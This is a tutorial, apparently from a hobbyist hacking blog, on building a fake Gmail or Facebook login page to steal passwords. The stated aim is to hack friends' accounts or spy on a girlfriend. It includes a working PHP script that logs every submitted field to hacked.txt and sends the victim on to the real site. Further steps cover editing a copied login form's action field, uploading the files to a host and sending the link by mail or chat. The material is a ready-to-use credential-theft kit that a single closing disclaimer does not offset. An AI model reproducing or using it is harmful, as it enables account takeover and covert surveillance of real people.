How to create Fack page:-


Phishing Attack:-

Hai Babies, If you do not know what exactly Phishing means, Just read this first.

download (4)

Phishing Page

If you want to hack your friends gmail acount or you want to know with whom your girl friend is chatting infacebook, then just try this and you can spy them without their knowledge.
I could simply give you the phishing page generators or already made fake web pages but I want you to manually create yourself.

First, I shoud tell you the basic methodology of making phishing page of any website. In a website where the users are supposed to enter/submit any data (data might be email,password or anything), there is a piece of code in html code called as action form. It looks like this
<form method=”POST” action=”something”>.
You can find this out by simply viewing the source of web page. Right click on webpage to do so. “something” here in the action field is name or path of the file where submitted data goes. So the idea offake login page is simple. Just download the webpage on your computer, modify the action field to change the path where data goes according to yourself, upload this modified webpage on any web hosting site and you are done..

Steps to create Phishing page:-

1. Create one account in any of the following sites, its for uploading your php @ phishing page.

(,, etc)

2. Copy this code and save it as accverify.php
header (‘Location: ‘);                                                                                Note:-{Here u can use any address u like to create fack}
$handle = fopen(“hacked.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
3. Create one blank notepad and save it as hacked.txt.

4. Now open, and right click the page and select view source code.
Copy that in notepad and save it as gmailfake.html ( any name you can give)


Facebook Phishing Page

5. Open gmailfake.html in notepad and press CTRL + F, type action in that find box and search it.

replace the action field and put your php file name.
action – “http//”

replace this as action=”accverify.php”
6. save this as .html.

7. Now open the, go to control panel, select file manager and upload the three files on it. (accverify.php, gmailfake.html, hacked.txt)

8. Now open the link “


Phishing Attack

9. It will show a webpage as like gmail. When someone enter the username and pasword, it will redirect to original website, And the password will save on hacked.txt.
10. You can send this link as mail, or when chatting and now you can hack your friends account.
I hope you understand..! This Stuff..!

Hacking anybody’s account with wrong intentions is a Cyber Crime

See this tutorial to understand clearly:-